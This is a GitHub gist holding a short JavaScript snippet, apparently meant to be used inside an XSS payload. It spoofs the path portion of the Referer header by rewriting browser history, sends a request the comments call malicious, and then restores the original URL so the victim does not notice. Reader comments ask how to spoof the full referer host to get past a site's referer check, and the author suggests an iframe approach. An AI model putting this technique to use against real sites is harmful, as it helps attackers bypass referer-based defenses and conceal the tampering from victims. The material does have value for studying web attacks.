-
-
Save hoodoer/c4eb12b99d5902119fb30e8343b5b228 to your computer and use it in GitHub Desktop.
// Save the current URL path to restore after making | |
// malicious request with faked referer header value | |
var savedPath = window.location.pathname; | |
var savedSearch = window.location.search; | |
// Change URL/History to control the referer header value | |
// Swap out "/this-is-my-fake-referer-value" to be what you need | |
window.history.replaceState(null, '', '/this-is-my-fake-referer-value'); | |
// Send malicious request with faked referer header value | |
// NOTE: this assumes you're using some xhr request, adjust | |
// based on whatever your XSS payload is actually doing | |
xhr.send(body); | |
// Restore the URL value to the original one before | |
// the XSS victim notices their location bar changed | |
window.history.replaceState(null, '', savedPath + savedSearch); |
Hey @hoodoer, thanks for the great article. Is there a way to similarly modify the host part of the referer using javascript ?
There is a url I need to be able to access directly, however, the target host does not let me access it directly unless the referer is said host.
@alkanna I'm afraid not, just the relative path.
@alkanna, I wonder if you could create an iframe in the page you have running JavaScript, put the needed host into the iframe, and then make the request from that context? I haven't coded that up to try, but might be possible. Would be fun to play with for sure.
Is it possible to change the entire referrer header? Not the "/this-is-my-fake-referer-value" part. Is it possible to change it like "http://referer.com"?
Is it possible to change the entire referrer header? Not the "/this-is-my-fake-referer-value" part. Is it possible to change it like "http://referer.com"?
I'm afraid not, you can only control the relative path under the host.
A blog walking through this in use can be found at:
https://www.trustedsec.com/blog/setting-the-referer-header-using-javascript/